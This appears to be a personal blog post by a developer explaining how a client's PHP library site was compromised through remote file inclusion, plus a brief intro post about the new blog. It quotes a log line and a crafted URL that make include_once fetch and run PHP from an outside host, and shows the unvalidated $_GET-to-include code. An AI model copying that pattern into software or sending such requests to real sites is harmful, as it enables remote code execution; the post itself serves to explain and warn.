Security Issue in PHP – include_once

There is an interesting hack in an account of our client on our webhosting service. It is an online library system of our client which is written in PHP. One day, the system admin reported that the postfix died becaue of a lot of spam mails sending from the online library system. When I checked the log and saw the log like the following:

1171167204.920 534343 xxx.xx.xx.xxx TCP_MISS/200 63463 POST http://www.example.com/php/index.php?Name=http://www.geocities.com/meet_kunleb/Login/Meet_KunleB_Mail/Logon.do.txt?

When I go the the php file and know how the cracker crack the system. The problem is about php.

<?php
...
$pagename =$_GET['Name'];
...
?>
...
<?php include_once("{$pagename}_main.inc");?>
...

The problem is that the $pagename does not have any gruad to check the value that got by $_Get[‘name’].

The function of include_once is allow to include the source from outside, http://example.com/aaa.php

So, when cracker use a ‘http://example.org/aaa.txt?’ as name, and use the url, http://example.com/php/index.php?Name=http://example.org/aaa.txt? ,

The $pagename will become http://example.org/aaa.txt? and the indule_once function will execute as:


<?php include_once("http://example.org/aaa.txt?_main.inc");?>

That will executes the php script in http://example.org/aaa.txt and _main.inc will be an ARGV for that php script. This will be a security hole of the system.

So that for security, if it is necessary to use include_once, include function in dynamic,
it has to have a check to see it is from the place you want before.

New Site

This is my new blog. It is for me to put some photos, put down the notes in programming or any other things. I used to use xanga and blogger but I could not get all the functions that I want to have. Also, I have about 5.6GB Photos. It seems that there is no blog or gallery provider allows such kind of large size files. Finally, I would like to host the blog and gallery on my own.

I am from Hong Kong and working in a software house currently. This blog will mainly be in Chinese but partly in English.